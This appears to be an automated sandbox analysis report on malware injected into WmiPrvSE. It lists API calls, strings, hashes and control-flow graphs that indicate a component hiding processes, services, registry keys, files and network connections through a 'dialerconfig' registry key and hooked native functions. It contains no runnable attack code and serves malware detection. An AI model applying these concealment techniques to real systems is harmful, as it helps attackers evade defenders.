                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 106492572-2879589442
                                                  • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction ID: 74e9b7de03cc36a8a50128a1d0ba716784c7176efb6a80b4fa8bd0760b5821d1
                                                  • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction Fuzzy Hash: 3771E876611E7287FB109F67E8506EB23A4F784B98F401121DA4E47B69EE35C444C748

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction ID: 56c2be118a202614004c6c479e4ef25cf97ed3bf804872c77ef91c327d47b5c0
                                                  • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction Fuzzy Hash: 8F511676201FA587EB54CF63E9483ABB7E1F789B99F144124DA4A07B68DF3CC0498B04

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                  • API String ID: 4175298099-1975688563
                                                  • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction ID: 6390a7f49ed69d06baf940dea7ca4c5d33c2f4884a41a334f23daade4d3772a6
                                                  • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction Fuzzy Hash: 0C31C475500D7BA3FA04EF67ED516F723A1BB10398FD05033D60A02171DE38928ACB58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 207 1f43c516910-1f43c516916 208 1f43c516918-1f43c51691b 207->208 209 1f43c516951-1f43c51695b 207->209 211 1f43c516945-1f43c516984 call 1f43c516fc0 208->211 212 1f43c51691d-1f43c516920 208->212 210 1f43c516a78-1f43c516a8d 209->210 216 1f43c516a9c-1f43c516ab6 call 1f43c516e54 210->216 217 1f43c516a8f 210->217 229 1f43c51698a-1f43c51699f call 1f43c516e54 211->229 230 1f43c516a52 211->230 214 1f43c516938 __scrt_dllmain_crt_thread_attach 212->214 215 1f43c516922-1f43c516925 212->215 218 1f43c51693d-1f43c516944 214->218 220 1f43c516927-1f43c516930 215->220 221 1f43c516931-1f43c516936 call 1f43c516f04 215->221 227 1f43c516ab8-1f43c516aed call 1f43c516f7c call 1f43c516e1c call 1f43c517318 call 1f43c517130 call 1f43c517154 call 1f43c516fac 216->227 228 1f43c516aef-1f43c516b20 call 1f43c517190 216->228 222 1f43c516a91-1f43c516a9b 217->222 221->218 227->222 239 1f43c516b31-1f43c516b37 228->239 240 1f43c516b22-1f43c516b28 228->240 242 1f43c5169a5-1f43c5169b6 call 1f43c516ec4 229->242 243 1f43c516a6a-1f43c516a77 call 1f43c517190 229->243 233 1f43c516a54-1f43c516a69 230->233 245 1f43c516b39-1f43c516b43 239->245 246 1f43c516b7e-1f43c516b94 call 1f43c51268c 239->246 240->239 244 1f43c516b2a-1f43c516b2c 240->244 260 1f43c516a07-1f43c516a11 call 1f43c517130 242->260 261 1f43c5169b8-1f43c5169dc call 1f43c5172dc call 1f43c516e0c call 1f43c516e38 call 1f43c51ac0c 242->261 243->210 250 1f43c516c1f-1f43c516c2c 244->250 251 1f43c516b45-1f43c516b4d 245->251 252 1f43c516b4f-1f43c516b5d call 1f43c525780 245->252 268 1f43c516b96-1f43c516b98 246->268 269 1f43c516bcc-1f43c516bce 246->269 257 1f43c516b63-1f43c516b78 call 1f43c516910 251->257 252->257 272 1f43c516c15-1f43c516c1d 252->272 257->246 257->272 260->230 282 1f43c516a13-1f43c516a1f call 1f43c517180 260->282 261->260 310 1f43c5169de-1f43c5169e5 __scrt_dllmain_after_initialize_c 261->310 268->269 277 1f43c516b9a-1f43c516bbc call 1f43c51268c call 1f43c516a78 268->277 270 1f43c516bd5-1f43c516bea call 1f43c516910 269->270 271 1f43c516bd0-1f43c516bd3 269->271 270->272 291 1f43c516bec-1f43c516bf6 270->291 271->270 271->272 272->250 277->269 303 1f43c516bbe-1f43c516bc6 call 1f43c525780 277->303 299 1f43c516a45-1f43c516a50 282->299 300 1f43c516a21-1f43c516a2b call 1f43c517098 282->300 296 1f43c516bf8-1f43c516bff 291->296 297 1f43c516c01-1f43c516c11 call 1f43c525780 291->297 296->272 297->272 299->233 300->299 309 1f43c516a2d-1f43c516a3b 300->309 303->269 309->299 310->260 311 1f43c5169e7-1f43c516a04 call 1f43c51abc8 310->311 311->260
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                  • API String ID: 190073905-1786718095
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 9ca37e1f449c8b57ead7480c6c0404165d47bf0f63e65695bcf3587cd18279a8
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: 0481DF31702E7387FE50AB2798493FB22D0FB95B88F588135AB6547796DF38C9458708

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 000001F43C54CE37
                                                  • FlsGetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CE4C
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CE6D
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CE9A
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CEAB
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CEBC
                                                  • SetLastError.KERNEL32 ref: 000001F43C54CED7
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF0D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,000001F43C54ECCC,?,?,?,?,000001F43C54BF9F,?,?,?,?,?,000001F43C547AB0), ref: 000001F43C54CF2C
                                                    • Part of subcall function 000001F43C54D6CC: HeapAlloc.KERNEL32 ref: 000001F43C54D721
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF54
                                                    • Part of subcall function 000001F43C54D744: HeapFree.KERNEL32 ref: 000001F43C54D75A
                                                    • Part of subcall function 000001F43C54D744: GetLastError.KERNEL32 ref: 000001F43C54D764
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF65
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF76
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                  • String ID:
                                                  • API String ID: 570795689-0
                                                  • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction ID: bf3fd5c5c1e5fa9902cbb161980078e8aa4cbca625af3a669604916522f418ba
                                                  • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction Fuzzy Hash: E5417C30301E7747FE69A73799513FB32C27B847B0F340734AB368A6E6DE28A4519608

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                  • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                  • API String ID: 2171963597-1373409510
                                                  • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction ID: bc311bd4bfbdd512de59420b27951e7ef25f52a6d9d7746056e23ca5d412341e
                                                  • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction Fuzzy Hash: BC213C76614A7183FB10CB26E5443AA63A1F789BA5F500225EB5A03BA8CF3CC149CF04

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 465 1f43c519944-1f43c5199ac call 1f43c51a814 468 1f43c519e13-1f43c519e1b call 1f43c51bb48 465->468 469 1f43c5199b2-1f43c5199b5 465->469 469->468 470 1f43c5199bb-1f43c5199c1 469->470 472 1f43c5199c7-1f43c5199cb 470->472 473 1f43c519a90-1f43c519aa2 470->473 472->473 477 1f43c5199d1-1f43c5199dc 472->477 475 1f43c519aa8-1f43c519aac 473->475 476 1f43c519d63-1f43c519d67 473->476 475->476 478 1f43c519ab2-1f43c519abd 475->478 480 1f43c519d69-1f43c519d70 476->480 481 1f43c519da0-1f43c519daa call 1f43c518a34 476->481 477->473 479 1f43c5199e2-1f43c5199e7 477->479 478->476 483 1f43c519ac3-1f43c519aca 478->483 479->473 484 1f43c5199ed-1f43c5199f7 call 1f43c518a34 479->484 480->468 485 1f43c519d76-1f43c519d9b call 1f43c519e1c 480->485 481->468 491 1f43c519dac-1f43c519dcb call 1f43c516d40 481->491 487 1f43c519c94-1f43c519ca0 483->487 488 1f43c519ad0-1f43c519b07 call 1f43c518e10 483->488 484->491 499 1f43c5199fd-1f43c519a28 call 1f43c518a34 * 2 call 1f43c519124 484->499 485->481 487->481 492 1f43c519ca6-1f43c519caa 487->492 488->487 503 1f43c519b0d-1f43c519b15 488->503 496 1f43c519cba-1f43c519cc2 492->496 497 1f43c519cac-1f43c519cb8 call 1f43c5190e4 492->497 496->481 502 1f43c519cc8-1f43c519cd5 call 1f43c518cb4 496->502 497->496 509 1f43c519cdb-1f43c519ce3 497->509 533 1f43c519a48-1f43c519a52 call 1f43c518a34 499->533 534 1f43c519a2a-1f43c519a2e 499->534 502->481 502->509 507 1f43c519b19-1f43c519b4b 503->507 511 1f43c519c87-1f43c519c8e 507->511 512 1f43c519b51-1f43c519b5c 507->512 514 1f43c519df6-1f43c519e12 call 1f43c518a34 * 2 call 1f43c51baa8 509->514 515 1f43c519ce9-1f43c519ced 509->515 511->487 511->507 512->511 516 1f43c519b62-1f43c519b7b 512->516 514->468 520 1f43c519cef-1f43c519cfe call 1f43c5190e4 515->520 521 1f43c519d00 515->521 522 1f43c519c74-1f43c519c79 516->522 523 1f43c519b81-1f43c519bc6 call 1f43c5190f8 * 2 516->523 529 1f43c519d03-1f43c519d0d call 1f43c51a8ac 520->529 521->529 525 1f43c519c84 522->525 546 1f43c519c04-1f43c519c0a 523->546 547 1f43c519bc8-1f43c519bee call 1f43c5190f8 call 1f43c51a038 523->547 525->511 529->481 544 1f43c519d13-1f43c519d61 call 1f43c518d44 call 1f43c518f50 529->544 533->473 550 1f43c519a54-1f43c519a74 call 1f43c518a34 * 2 call 1f43c51a8ac 533->550 534->533 538 1f43c519a30-1f43c519a3b 534->538 538->533 543 1f43c519a3d-1f43c519a42 538->543 543->468 543->533 544->481 554 1f43c519c7b 546->554 555 1f43c519c0c-1f43c519c10 546->555 565 1f43c519c15-1f43c519c72 call 1f43c519870 547->565 566 1f43c519bf0-1f43c519c02 547->566 571 1f43c519a76-1f43c519a80 call 1f43c51a99c 550->571 572 1f43c519a8b 550->572 556 1f43c519c80 554->556 555->523 556->525 565->556 566->546 566->547 575 1f43c519a86-1f43c519def call 1f43c5186ac call 1f43c51a3f4 call 1f43c5188a0 571->575 576 1f43c519df0-1f43c519df5 call 1f43c51baa8 571->576 572->473 575->576 576->514
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction ID: 4ba18bb60a7f7e2ff171842eb5cacfecb7860d21566915ac70216b585e6c40c4
                                                  • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction Fuzzy Hash: F8E16872604B628BFF609B2694883EE77E0F755B9CF100125EBAA57B99CB38C591C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 586 1f43c54a544-1f43c54a5ac call 1f43c54b414 589 1f43c54a5b2-1f43c54a5b5 586->589 590 1f43c54aa13-1f43c54aa1b call 1f43c54c748 586->590 589->590 591 1f43c54a5bb-1f43c54a5c1 589->591 593 1f43c54a5c7-1f43c54a5cb 591->593 594 1f43c54a690-1f43c54a6a2 591->594 593->594 598 1f43c54a5d1-1f43c54a5dc 593->598 596 1f43c54a6a8-1f43c54a6ac 594->596 597 1f43c54a963-1f43c54a967 594->597 596->597 599 1f43c54a6b2-1f43c54a6bd 596->599 601 1f43c54a969-1f43c54a970 597->601 602 1f43c54a9a0-1f43c54a9aa call 1f43c549634 597->602 598->594 600 1f43c54a5e2-1f43c54a5e7 598->600 599->597 603 1f43c54a6c3-1f43c54a6ca 599->603 600->594 604 1f43c54a5ed-1f43c54a5f7 call 1f43c549634 600->604 601->590 605 1f43c54a976-1f43c54a99b call 1f43c54aa1c 601->605 602->590 615 1f43c54a9ac-1f43c54a9cb call 1f43c547940 602->615 607 1f43c54a894-1f43c54a8a0 603->607 608 1f43c54a6d0-1f43c54a707 call 1f43c549a10 603->608 604->615 620 1f43c54a5fd-1f43c54a628 call 1f43c549634 * 2 call 1f43c549d24 604->620 605->602 607->602 612 1f43c54a8a6-1f43c54a8aa 607->612 608->607 624 1f43c54a70d-1f43c54a715 608->624 617 1f43c54a8ba-1f43c54a8c2 612->617 618 1f43c54a8ac-1f43c54a8b8 call 1f43c549ce4 612->618 617->602 623 1f43c54a8c8-1f43c54a8d5 call 1f43c5498b4 617->623 618->617 630 1f43c54a8db-1f43c54a8e3 618->630 655 1f43c54a648-1f43c54a652 call 1f43c549634 620->655 656 1f43c54a62a-1f43c54a62e 620->656 623->602 623->630 628 1f43c54a719-1f43c54a74b 624->628 632 1f43c54a887-1f43c54a88e 628->632 633 1f43c54a751-1f43c54a75c 628->633 635 1f43c54a8e9-1f43c54a8ed 630->635 636 1f43c54a9f6-1f43c54aa12 call 1f43c549634 * 2 call 1f43c54c6a8 630->636 632->607 632->628 633->632 637 1f43c54a762-1f43c54a77b 633->637 639 1f43c54a900 635->639 640 1f43c54a8ef-1f43c54a8fe call 1f43c549ce4 635->640 636->590 641 1f43c54a874-1f43c54a879 637->641 642 1f43c54a781-1f43c54a7c6 call 1f43c549cf8 * 2 637->642 645 1f43c54a903-1f43c54a90d call 1f43c54b4ac 639->645 640->645 647 1f43c54a884 641->647 667 1f43c54a7c8-1f43c54a7ee call 1f43c549cf8 call 1f43c54ac38 642->667 668 1f43c54a804-1f43c54a80a 642->668 645->602 665 1f43c54a913-1f43c54a961 call 1f43c549944 call 1f43c549b50 645->665 647->632 655->594 671 1f43c54a654-1f43c54a674 call 1f43c549634 * 2 call 1f43c54b4ac 655->671 656->655 658 1f43c54a630-1f43c54a63b 656->658 658->655 664 1f43c54a63d-1f43c54a642 658->664 664->590 664->655 665->602 686 1f43c54a815-1f43c54a872 call 1f43c54a470 667->686 687 1f43c54a7f0-1f43c54a802 667->687 675 1f43c54a87b 668->675 676 1f43c54a80c-1f43c54a810 668->676 692 1f43c54a68b 671->692 693 1f43c54a676-1f43c54a680 call 1f43c54b59c 671->693 680 1f43c54a880 675->680 676->642 680->647 686->680 687->667 687->668 692->594 696 1f43c54a686-1f43c54a9ef call 1f43c5492ac call 1f43c54aff4 call 1f43c5494a0 693->696 697 1f43c54a9f0-1f43c54a9f5 call 1f43c54c6a8 693->697 696->697 697->636
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: aafa923bcba82b6be8ae00af4d8b5db3ec9649b79742a36e3fcc25e1c44b9e43
                                                  • Instruction ID: 623ce3150fdf247c27396c98418e7f233fcdbfc54e4715f78f9b36cafe8b9103
                                                  • Opcode Fuzzy Hash: aafa923bcba82b6be8ae00af4d8b5db3ec9649b79742a36e3fcc25e1c44b9e43
                                                  • Instruction Fuzzy Hash: 28E16B72604BB18BFBA09F6694823EE77E4F755B98F200126EF8957B99CB34C481C704

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 38dcbd5a2a2d0ec7fa1d86277db557ef3bef89b38fead37e513f868cac2f4410
                                                  • Instruction ID: 611a741576f9beb5b2b0478944c59847598150b52c1153bd1ce9e61ab609842d
                                                  • Opcode Fuzzy Hash: 38dcbd5a2a2d0ec7fa1d86277db557ef3bef89b38fead37e513f868cac2f4410
                                                  • Instruction Fuzzy Hash: FD418E32311E7293FA56CB6BAC047F722D1BB49BE0F6942359E0A87794EE38C445821C

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction ID: 53a6d973c5cd98bcc6426c81824b946fb4f576954b2cf140b86fdf356db156e3
                                                  • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction Fuzzy Hash: 2D414A72214FA5C7E760CF22E4447AB77A1F388B98F148129DB8A07B58DF39C449CB04

                                                  Control-flow Graph

                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D087
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0A6
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0CE
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0DF
                                                  • FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0F0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction ID: c0e8997a0e1b17836f5812653e1ba9590481c7f103a19ca64b2a82581fa66dfb
                                                  • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction Fuzzy Hash: C2115E30704A7643FE68A72799513FB61C17B847F0F355334AB79876EAEE28C4429208
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 82543f87e5c8cc9e8458c3094a326040841d94201928816f4504509ae265ca32
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: B4818C71601E738BFB50AB67A8413FB26D1FB857C0F644435AB49877A6EB38C845CB08
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 9a692e6453de9d4801212d2d0819b84da1bdd69154ddd7f321b39c2fb227d254
                                                  • Instruction ID: c81be210d49be451d4c670f87e538fc8d3836a34efa351bdfd0e52dfe11ec956
                                                  • Opcode Fuzzy Hash: 9a692e6453de9d4801212d2d0819b84da1bdd69154ddd7f321b39c2fb227d254
                                                  • Instruction Fuzzy Hash: AB319032216E72E2FE61DB43A401BF722D8B748BA0F6905359E2E0B794EF39C4558708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction ID: a6455e7192dc75252e954b29d188b83d2d743b5210fe30c929dbab4033a8a1a3
                                                  • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction Fuzzy Hash: 6C114631710EA287F7508B53A8443BAA6E0B798FE4F044224EB5A877A4CF38C9148B48
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction ID: 7a6fc9fb5c9301498c2d821ab21d7ce4d2b9f67005b9e251032e7744b56ab8e2
                                                  • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction Fuzzy Hash: BD112A36706BB283FB549B22E4042BAA6A0F748B95F540039DF8A07764EF2DC505CB08
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                  • Instruction ID: 808154e0ce6e0650144f7d2a4a0dff207c49590d50bf243280a5087beb5c2f81
                                                  • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                  • Instruction Fuzzy Hash: B3D17776208FB986EA609F06E4943AB77E0F388B84F500126EBCD47BA5DF39C551CB44
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: dialer
                                                  • API String ID: 756756679-3528709123
                                                  • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction ID: d238c7ba27fa48e304b32e40cf45fc05aed8e0c17ae681c6f4e548550bd89d49
                                                  • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction Fuzzy Hash: A8316732601F7293FA55CF17E9446BAA7E0BB54B80F5881309F4947B66EF38D4A18708
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
